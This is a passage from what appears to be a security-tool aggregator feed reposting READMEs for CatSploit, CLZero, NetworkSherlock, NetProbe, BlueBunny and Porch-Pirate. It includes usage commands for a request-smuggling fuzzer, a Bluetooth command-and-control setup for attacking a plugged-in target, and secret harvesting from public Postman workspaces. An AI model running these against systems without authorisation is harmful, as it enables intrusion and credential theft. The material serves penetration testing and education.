    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 80 โ”‚ jQuery < 1.6.3 XSS Vulnerability โ”‚ CVE-2011-4969 โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 80 โ”‚ Drupal 7.0 Information Disclosure Vulnerability - Active Check โ”‚ CVE-2011-3730 โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 631 โ”‚ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS โ”‚ CVE-2016-2183 โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 631 โ”‚ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS โ”‚ CVE-2016-6329 โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 631 โ”‚ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS โ”‚ CVE-2020-12872 โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 631 โ”‚ SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection โ”‚ CVE-2011-3389 โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 631 โ”‚ SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection โ”‚ CVE-2015-0204 โ”‚
    โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€& #9472;โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

    [Users]
    โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”“
    โ”ƒ user name โ”ƒ group โ”ƒ
    โ”กโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”ฉ
    โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜


    catsploit> plan attacker h_exbiy6
    Planning attack scenario...100%
    [*] Done. 15 scenarios was planned.
    [*] To check each scenario, try 'scenario list' and/or 'scenario detail'.
    catsploit> scenario list
    โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ” โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”“
    โ”ƒ scenario id โ”ƒ src host ip โ”ƒ target host ip โ”ƒ eVc โ”ƒ eVd โ”ƒ steps โ”ƒ first attack step โ”ƒ
    โ”กโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”&#947 3;โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ฉ
    โ”‚ 3d3ivc โ”‚ 0.0.0.0 โ”‚ 192.168.0.10 โ”‚ 1.0 โ”‚ 32.0 โ”‚ 1 โ”‚ exploit/multi/http/jenkins_sโ€ฆ โ”‚
    โ”‚ 5gnsvh โ”‚ 0.0.0.0 โ”‚ 192.168.0.10 โ”‚ 1.0 โ”‚ 53.76 โ”‚ 2 โ”‚ exploit/multi/http/jenkins_sโ€ฆ โ”‚
    โ”‚ 6nlxyc โ”‚ 0.0.0.0 โ”‚ 192.168.0.10 โ”‚ 0.0 โ”‚ 48.32 โ”‚ 2 โ”‚ exploit/multi/http/jenkins_sโ€ฆ โ”‚
    โ”‚ 8jos4z โ”‚ 0.0.0.0 โ”‚ 192.168.0.1 0 โ”‚ 0.7 โ”‚ 72.8 โ”‚ 2 โ”‚ exploit/multi/http/jenkins_sโ€ฆ โ”‚
    โ”‚ 8kmmts โ”‚ 0.0.0.0 โ”‚ 192.168.0.10 โ”‚ 0.0 โ”‚ 32.0 โ”‚ 1 โ”‚ exploit/multi/elasticsearch/โ€ฆ โ”‚
    โ”‚ agjmma โ”‚ 0.0.0.0 โ”‚ 192.168.0.10 โ”‚ 0.0 โ”‚ 24.0 โ”‚ 1 โ”‚ exploit/windows/http/manageeโ€ฆ โ”‚
    โ”‚ joglhf โ”‚ 0.0.0.0 โ”‚ 192.168.0.10 โ”‚ 70.0 โ”‚ 60.0 โ”‚ 1 โ”‚ auxiliary/scanner/ssh/ssh_loโ€ฆ โ”‚
    โ”‚ rmgrof โ”‚ 0.0.0.0 โ”‚ 192.168.0.10 โ”‚ 100.0 โ”‚ 32.0 โ”‚ 1 โ”‚ exploit/multi/http/drupal_drโ€ฆ โ”‚
    โ”‚ xuowzk โ”‚ 0.0.0.0 โ”‚ 192.168.0.10 โ”‚ 0.0 โ”‚ 24.0 โ”‚ 1 โ”‚ exploit/multi/http/struts_dmโ€ฆ โ”‚
    โ”‚ yttv51 โ”‚ 0.0.0.0 โ”‚ 192.168.0.10 โ”‚ 0.01 โ”‚ 53.76 โ”‚ 2 โ”‚ exploit/multi/http/jenkins_sโ€ฆ โ”‚
    โ”‚ znv76x โ”‚ 0.0.0.0 โ”‚ 192.168.0.10 โ”‚ 0.01 โ”‚ 53.76 โ”‚ 2 โ”‚ exploit/multi/http/jenkins_sโ€ฆ โ”‚
    โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

    catsploit> scenario detail rmgrof
    โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”“
    โ”ƒ src host ip โ”ƒ target host ip โ”ƒ eVc โ”ƒ eVd โ”ƒ
    โ”กโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”ฉ
    โ”‚ 0.0.0.0 โ”‚ 192.168.0.10 โ”‚ 100.0 โ”‚ 32.0 โ”‚
    โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”˜

    [Steps]
    โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”“
    โ”ƒ # โ”ƒ step โ”ƒ params โ”ƒ
    โ”กโ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ” โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ฉ
    โ”‚ 1 โ”‚ exploit/multi/http/drupal_drupageddon โ”‚ RHOSTS: 192.168.0.10 โ”‚
    โ”‚ โ”‚ โ”‚ LHOST: 192.168.10.100 โ”‚
    โ””โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜


    catsploit> attack rmgrof
    > ~> ~
    > Metasploit Console Log
    > ~
    > ~
    [+] Attack scenario succeeded!


    catsploit> exit
    Bye.

    Disclaimer

    All informations and codes are provided solely for educational purposes and/or testing your own systems.

    Contact

    For any inquiry, please contact the email address as follows:

    catsploit@nk.MitsubishiElectric.co.jp



    CLZero - A Project For Fuzzing HTTP/1.1 CL.0 Request Smuggling Attack Vectors

    By: Zion3R


    A project for fuzzing HTTP/1.1 CL.0 Request Smuggling Attack Vectors.

    About

    Thank you to @albinowax, @defparam and @d3d else this tool would not exist. Inspired by the tool Smuggler all attack gadgets adapted from Smuggler and https://portswigger.net/research/how-to-turn-security-research-into-profit

    For more info see: https://moopinger.github.io/blog/fuzzing/clzero/tools/request/smuggling/2023/11/15/Fuzzing-With-CLZero.html


    Usage

    usage: clzero.py [-h] [-url URL] [-file FILE] [-index INDEX] [-verbose] [-no-color] [-resume] [-skipread] [-quiet] [-lb] [-config CONFIG] [-method METHOD]

    CLZero by Moopinger

    optional arguments:
    -h, --help show this help message and exit
    -url URL (-u), Single target URL.
    -file FILE (-f), Files containing multiple targets.
    -index INDEX (-i), Index start point when using a file list. Default is first line.
    -verbose (-v), Enable verbose output.
    -no-color Disable colors in HTTP Status
    -resume Resume scan from last index place.
    -skipread Skip the read response on smuggle requests, recommended. This will save a lot of time between requests. Ideal for targets with standard HTTP traffic.
    -quiet (-q), Disable output. Only successful payloads will be written to ./payloads/
    -lb Last byte sync method for least request latency. Due to th e nature of the request, it cannot guarantee that the smuggle request will be processed first. Ideal for targets with a high
    amount of traffic, and you do not mind sending multiple requests.
    -config CONFIG (-c) Config file to load, see ./configs/ to create custom payloads
    -method METHOD (-m) Method to use when sending the smuggle request. Default: POST

    single target attack:

    • python3 clzero.py -u https://www.target.com/ -c configs/default.py -skipread

    • python3 clzero.py -u https://www.target.com/ -c configs/default.py -lb

    Multi target attack:

    • python3 clzero.py -l urls.txt -c configs/default.py -skipread

    • python3 clzero.py -l urls.txt -c configs/default.py -lb

    Install

    git clone https://github.com/Moopinger/CLZero.git
    cd CLZero
    pip3 install -r requirements.txt


    NetworkSherlock - Powerful And Flexible Port Scanning Tool With Shodan

    By: Zion3R


    NetworkSherlock is a powerful and flexible port scanning tool designed for network security professionals and penetration testers. With its advanced capabilities, NetworkSherlock can efficiently scan IP ranges, CIDR blocks, and multiple targets. It stands out with its detailed banner grabbing capabilities across various protocols and integration with Shodan, the world's premier service for scanning and analyzing internet-connected devices. This Shodan integration enables NetworkSherlock to provide enhanced scanning capabilities, giving users deeper insights into network vulnerabilities and potential threats. By combining local port scanning with Shodan's extensive database, NetworkSherlock offers a comprehensive tool for identifying and analyzing network security issues.


    Features

    • Scans multiple IPs, IP ranges, and CIDR blocks.
    • Supports port scanning over TCP and UDP protocols.
    • Detailed banner grabbing feature.
    • Ping check for identifying reachable targets.
    • Multi-threading support for fast scanning operations.
    • Option to save scan results to a file.
    • Provides detailed version information.
    • Colorful console output for better readability.
    • Shodan integration for enhanced scanning capabilities.
    • Configuration file support for Shodan API key.

    Installation

    NetworkSherlock requires Python 3.6 or later.

    1. Clone the repository:
      git clone https://github.com/HalilDeniz/NetworkSherlock.git
    2. Install the required packages:
      pip install -r requirements.txt

    Configuration

    Update the networksherlock.cfg file with your Shodan API key:

    [SHODAN]
    api_key = YOUR_SHODAN_API_KEY

    Usage

    Port Scan Tool positional arguments: target Target IP address(es), range, or CIDR (e.g., 192.168.1.1, 192.168.1.1-192.168.1.5, 192.168.1.0/24) options: -h, --help show this help message and exit -p PORTS, --ports PORTS Ports to scan (e.g. 1-1024, 21,22,80, or 80) -t THREADS, --threads THREADS Number of threads to use -P {tcp,udp}, --protocol {tcp,udp} Protocol to use for scanning -V, --version-info Used to get version information -s SAVE_RESULTS, --save-results SAVE_RESULTS File to save scan results -c, --ping-check Perform ping check before scanning --use-shodan Enable Shodan integration for additional information " dir="auto">
    python3 networksherlock.py --help
    usage: networksherlock.py [-h] [-p PORTS] [-t THREADS] [-P {tcp,udp}] [-V] [-s SAVE_RESULTS] [-c] target

    NetworkSherlock: Port Scan Tool

    positional arguments:
    target Target IP address(es), range, or CIDR (e.g., 192.168.1.1, 192.168.1.1-192.168.1.5,
    192.168.1.0/24)

    options:
    -h, --help show this help message and exit
    -p PORTS, --ports PORTS
    Ports to scan (e.g. 1-1024, 21,22,80, or 80)
    -t THREADS, --threads THREADS
    Number of threads to use
    -P {tcp,udp}, --protocol {tcp,udp}
    Protocol to use for scanning
    -V, --version-info Used to get version information
    -s SAVE_RESULTS, --save-results SAVE_RESULTS
    File to save scan results
    -c, --ping-check Perform ping check before scanning
    --use-shodan Enable Shodan integration for additional information

    Basic Parameters

    • target: The target IP address(es), IP range, or CIDR block to scan.
    • -p, --ports: Ports to scan (e.g., 1-1000, 22,80,443).
    • -t, --threads: Number of threads to use.
    • -P, --protocol: Protocol to use for scanning (tcp or udp).
    • -V, --version-info: Obtain version information during banner grabbing.
    • -s, --save-results: Save results to the specified file.
    • -c, --ping-check: Perform a ping check before scanning.
    • --use-shodan: Enable Shodan integration.

    Example Usage

    Basic Port Scan

    Scan a single IP address on default ports:

    python networksherlock.py 192.168.1.1

    Custom Port Range

    Scan an IP address with a custom range of ports:

    python networksherlock.py 192.168.1.1 -p 1-1024

    Multiple IPs and Port Specification

    Scan multiple IP addresses on specific ports:

    python networksherlock.py 192.168.1.1,192.168.1.2 -p 22,80,443

    CIDR Block Scan

    Scan an entire subnet using CIDR notation:

    python networksherlock.py 192.168.1.0/24 -p 80

    Using Multi-Threading

    Perform a scan using multiple threads for faster execution:

    python networksherlock.py 192.168.1.1-192.168.1.5 -p 1-1024 -t 20

    Scanning with Protocol Selection

    Scan using a specific protocol (TCP or UDP):

    python networksherlock.py 192.168.1.1 -p 53 -P udp

    Scan with Shodan

    python networksherlock.py 192.168.1.1 --use-shodan

    Scan Multiple Targets with Shodan

    python networksherlock.py 192.168.1.1,192.168.1.2 -p 22,80,443 -V --use-shodan

    Banner Grabbing and Save Results

    Perform a detailed scan with banner grabbing and save results to a file:

    python networksherlock.py 192.168.1.1 -p 1-1000 -V -s results.txt

    Ping Check Before Scanning

    Scan an IP range after performing a ping check:

    python networksherlock.py 10.0.0.1-10.0.0.255 -c

    OUTPUT EXAMPLE

    $ python3 networksherlock.py 10.0.2.12 -t 25 -V -p 21-6000 -t 25
    ********************************************
    Scanning target: 10.0.2.12
    Scanning IP : 10.0.2.12
    Ports : 21-6000
    Threads : 25
    Protocol : tcp
    ---------------------------------------------
    Port Status Service VERSION
    22 /tcp open ssh SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
    21 /tcp open telnet 220 (vsFTPd 2.3.4)
    80 /tcp open http HTTP/1.1 200 OK
    139 /tcp open netbios-ssn %SMBr
    25 /tcp open smtp 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
    23 /tcp open smtp #' #'
    445 /tcp open microsoft-ds %SMBr
    514 /tcp open shell
    512 /tcp open exec Where are you?
    1524/tcp open ingreslock ro ot@metasploitable:/#
    2121/tcp open iprop 220 ProFTPD 1.3.1 Server (Debian) [::ffff:10.0.2.12]
    3306/tcp open mysql >
    5900/tcp open unknown RFB 003.003
    53 /tcp open domain
    ---------------------------------------------

    OutPut Example

    $ python3 networksherlock.py 10.0.2.0/24 -t 10 -V -p 21-1000
    ********************************************
    Scanning target: 10.0.2.1
    Scanning IP : 10.0.2.1
    Ports : 21-1000
    Threads : 10
    Protocol : tcp
    ---------------------------------------------
    Port Status Service VERSION
    53 /tcp open domain
    ********************************************
    Scanning target: 10.0.2.2
    Scanning IP : 10.0.2.2
    Ports : 21-1000
    Threads : 10
    Protocol : tcp
    ---------------------------------------------
    Port Status Service VERSION
    445 /tcp open microsoft-ds
    135 /tcp open epmap
    ********************************************
    Scanning target: 10.0.2.12
    Scanning IP : 10.0.2.12
    Ports : 21- 1000
    Threads : 10
    Protocol : tcp
    ---------------------------------------------
    Port Status Service VERSION
    21 /tcp open ftp 220 (vsFTPd 2.3.4)
    22 /tcp open ssh SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
    23 /tcp open telnet #'
    80 /tcp open http HTTP/1.1 200 OK
    53 /tcp open kpasswd 464/udpcp
    445 /tcp open domain %SMBr
    3306/tcp open mysql >
    ********************************************
    Scanning target: 10.0.2.20
    Scanning IP : 10.0.2.20
    Ports : 21-1000
    Threads : 10
    Protocol : tcp
    ---------------------------------------------
    Port Status Service VERSION
    22 /tcp open ssh SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9

    Contributing

    Contributions are welcome! To contribute to NetworkSherlock, follow these steps:

    1. Fork the repository.
    2. Create a new branch for your feature or bug fix.
    3. Make your changes and commit them.
    4. Push your changes to your forked repository.
    5. Open a pull request in the main repository.

    Contact



    NetProbe - Network Probe

    By: Zion3R


    NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.

    Features

    • Scan for devices on a specified IP address or subnet
    • Display the IP address, MAC address, manufacturer, and device model of discovered devices
    • Live tracking of devices (optional)
    • Save scan results to a file (optional)
    • Filter by manufacturer (e.g., 'Apple') (optional)
    • Filter by IP range (e.g., '192.168.1.0/24') (optional)
    • Scan rate in seconds (default: 5) (optional)

    Download

    You can download the program from the GitHub page.

    $ git clone https://github.com/HalilDeniz/NetProbe.git

    Installation

    To install the required libraries, run the following command:

    $ pip install -r requirements.txt

    Usage

    To run the program, use the following command:

    $ python3 netprobe.py [-h] -t  [...] -i  [...] [-l] [-o] [-m] [-r] [-s]
    • -h,--help: show this help message and exit
    • -t,--target: Target IP address or subnet (default: 192.168.1.0/24)
    • -i,--interface: Interface to use (default: None)
    • -l,--live: Enable live tracking of devices
    • -o,--output: Output file to save the results
    • -m,--manufacturer: Filter by manufacturer (e.g., 'Apple')
    • -r,--ip-range: Filter by IP range (e.g., '192.168.1.0/24')
    • -s,--scan-rate: Scan rate in seconds (default: 5)

    Example:

    $ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l

    Help Menu

    Scanner Tool options: -h, --help show this help message and exit -t [ ...], --target [ ...] Target IP address or subnet (default: 192.168.1.0/24) -i [ ...], --interface [ ...] Interface to use (default: None) -l, --live Enable live tracking of devices -o , --output Output file to save the results -m , --manufacturer Filter by manufacturer (e.g., 'Apple') -r , --ip-range Filter by IP range (e.g., '192.168.1.0/24') -s , --scan-rate Scan rate in seconds (default: 5) " dir="auto">
    $ python3 netprobe.py --help                      
    usage: netprobe.py [-h] -t [...] -i [...] [-l] [-o] [-m] [-r] [-s]

    NetProbe: Network Scanner Tool

    options:
    -h, --help show this help message and exit
    -t [ ...], --target [ ...]
    Target IP address or subnet (default: 192.168.1.0/24)
    -i [ ...], --interface [ ...]
    Interface to use (default: None)
    -l, --live Enable live tracking of devices
    -o , --output Output file to save the results
    -m , --manufacturer Filter by manufacturer (e.g., 'Apple')
    -r , --ip-range Filter by IP range (e.g., '192.168.1.0/24')
    -s , --scan-rate Scan rate in seconds (default: 5)

    Default Scan

    $ python3 netprobe.py 

    Live Tracking

    You can enable live tracking of devices on your network by using the -l or --live flag. This will continuously update the device list every 5 seconds.

    $ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l

    Save Results

    You can save the scan results to a file by using the -o or --output flag followed by the desired output file name.

    $ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l -o results.txt
    โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”“
    โ”ƒ IP Address   โ”ƒ MAC Address       โ”ƒ Packet Size โ”ƒ Manufacturer                 โ”ƒ
    โ”กโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ฉ
    โ”‚ 192.168.1.1  โ”‚ **:6e:**:97:**:28 โ”‚ 102         โ”‚ ASUSTek COMPUTER INC.        โ”‚
    โ”‚ 192.168.1.3  โ”‚ 00:**:22:**:12:** โ”‚ 102         โ”‚ InPro Comm                   โ”‚
    โ”‚ 192.168.1.2  โ”‚ **:32:**:bf:**:00 โ”‚ 102         โ”‚ Xiaomi Communications Co Ltd โ”‚
    โ”‚ 192.168.1.98 โ”‚ d4:**:64:**:5c:** โ”‚ 102         โ”‚ ASUSTek COMPUTER INC.        โ”‚
    โ”‚ 192.168.1.25 โ”‚ **:49:**:00:**:38 โ”‚ 102         โ”‚ Unknown                      โ”‚
    โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
    

    Contact

    If you have any questions, suggestions, or feedback about the program, please feel free to reach out to me through any of the following platforms:

    License

    This program is released under the MIT LICENSE. See LICENSE for more information.



    BlueBunny - BLE Based C2 For Hak5's Bash Bunny

    By: Zion3R


    C2 solution that communicates directly over Bluetooth-Low-Energy with your Bash Bunny Mark II.
    Send your Bash Bunny all the instructions it needs just over the air.

    Overview

    Structure


    Installation & Start

    1. Install required dependencies
    pip install pygatt "pygatt[GATTTOOL]"

    Make sure BlueZ is installed and gatttool is usable

    sudo apt install bluez
    1. Download BlueBunny's repository (and switch into the correct folder)
    git clone https://github.com/90N45-d3v/BlueBunny
    cd BlueBunny/C2
    1. Start the C2 server
    sudo python c2-server.py
    1. Plug your Bash Bunny with the BlueBunny payload into the target machine (payload at: BlueBunny/payload.txt).
    2. Visit your C2 server from your browser on localhost:1472 and connect your Bash Bunny (Your Bash Bunny will light up green when it's ready to pair).

    Manual communication with the Bash Bunny through Python

    You can use BlueBunny's BLE backend and communicate with your Bash Bunny manually.

    Example Code

    # Import the backend (BlueBunny/C2/BunnyLE.py)
    import BunnyLE

    # Define the data to send
    data = "QUACK STRING I love my Bash Bunny"
    # Define the type of the data to send ("cmd" or "payload") (payload data will be temporary written to a file, to execute multiple commands like in a payload script file)
    d_type = "cmd"

    # Initialize BunnyLE
    BunnyLE.init()

    # Connect to your Bash Bunny
    bb = BunnyLE.connect()

    # Send the data and let it execute
    BunnyLE.send(bb, data, d_type)

    Troubleshooting

    Connecting your Bash Bunny doesn't work? Try the following instructions:

    • Try connecting a few more times
    • Check if your bluetooth adapter is available
    • Restart the system your C2 server is running on
    • Check if your Bash Bunny is running the BlueBunny payload properly
    • How far away from your Bash Bunny are you? Is the environment (distance, interferences etc.) still sustainable for typical BLE connections?

    Bugs within BlueZ

    The Bluetooth stack used is well known, but also very buggy. If starting the connection with your Bash Bunny does not work, it is probably a temporary problem due to BlueZ. Here are some kind of errors that can be caused by temporary bugs. These usually disappear at the latest after rebooting the C2's operating system, so don't be surprised and calm down if they show up.

    • Timeout after 5.0 seconds
    • Unknown error while scanning for BLE devices

    Working on...

    • Remote shell access
    • BLE exfiltration channel
    • Improved connecting process

    Additional information

    As I said, BlueZ, the base for the bluetooth part used in BlueBunny, is somewhat bug prone. If you encounter any non-temporary bugs when connecting to Bash Bunny as well as any other bugs/difficulties in the whole BlueBunny project, you are always welcome to contact me. Be it a problem, an idea/solution or just a nice feedback.



    Porch-Pirate - The Most Comprehensive Postman Recon / OSINT Client And Framework That Facilitates The Automated Discovery And Exploitation Of API Endpoints And Secrets Committed To Workspaces, Collections, Requests, Users And Teams

    By: Zion3R


    Porch Pirate started as a tool to quickly uncover Postman secrets, and has slowly begun to evolve into a multi-purpose reconaissance / OSINT framework for Postman. While existing tools are great proof of concepts, they only attempt to identify very specific keywords as "secrets", and in very limited locations, with no consideration to recon beyond secrets. We realized we required capabilities that were "secret-agnostic", and had enough flexibility to capture false-positives that still provided offensive value.

    Porch Pirate enumerates and presents sensitive results (global secrets, unique headers, endpoints, query parameters, authorization, etc), from publicly accessible Postman entities, such as:

    • Workspaces
    • Collections
    • Requests
    • Users
    • Teams

    Installation

    python3 -m pip install porch-pirate

    Using the client

    The Porch Pirate client can be used to nearly fully conduct reviews on public Postman entities in a quick and simple fashion. There are intended workflows and particular keywords to be used that can typically maximize results. These methodologies can be located on our blog: Plundering Postman with Porch Pirate.

    Porch Pirate supports the following arguments to be performed on collections, workspaces, or users.

    • --globals
    • --collections
    • --requests
    • --urls
    • --dump
    • --raw
    • --curl

    Simple Search

    porch-pirate -s "coca-cola.com"

    Get Workspace Globals

    By default, Porch Pirate will display globals from all active and inactive environments if they are defined in the workspace. Provide a -w argument with the workspace ID (found by performing a simple search, or automatic search dump) to extract the workspace's globals, along with other information.

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8

    Dump Workspace

    When an interesting result has been found with a simple search, we can provide the workspace ID to the -w argument with the --dump command to begin extracting information from the workspace and its collections.

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --dump

    Automatic Search and Globals Extraction

    Porch Pirate can be supplied a simple search term, following the --globals argument. Porch Pirate will dump all relevant workspaces tied to the results discovered in the simple search, but only if there are globals defined. This is particularly useful for quickly identifying potentially interesting workspaces to dig into further.

    porch-pirate -s "shopify" --globals

    Automatic Search Dump

    Porch Pirate can be supplied a simple search term, following the --dump argument. Porch Pirate will dump all relevant workspaces and collections tied to the results discovered in the simple search. This is particularly useful for quickly sifting through potentially interesting results.

    porch-pirate -s "coca-cola.com" --dump

    Extract URLs from Workspace

    A particularly useful way to use Porch Pirate is to extract all URLs from a workspace and export them to another tool for fuzzing.

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --urls

    Automatic URL Extraction

    Porch Pirate will recursively extract all URLs from workspaces and their collections related to a simple search term.

    porch-pirate -s "coca-cola.com" --urls

    Show Collections in a Workspace

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --collections

    Show Workspace Requests

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --requests

    Show raw JSON

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --raw

    Show Entity Information

    porch-pirate -w WORKSPACE_ID
    porch-pirate -c COLLECTION_ID
    porch-pirate -r REQUEST_ID
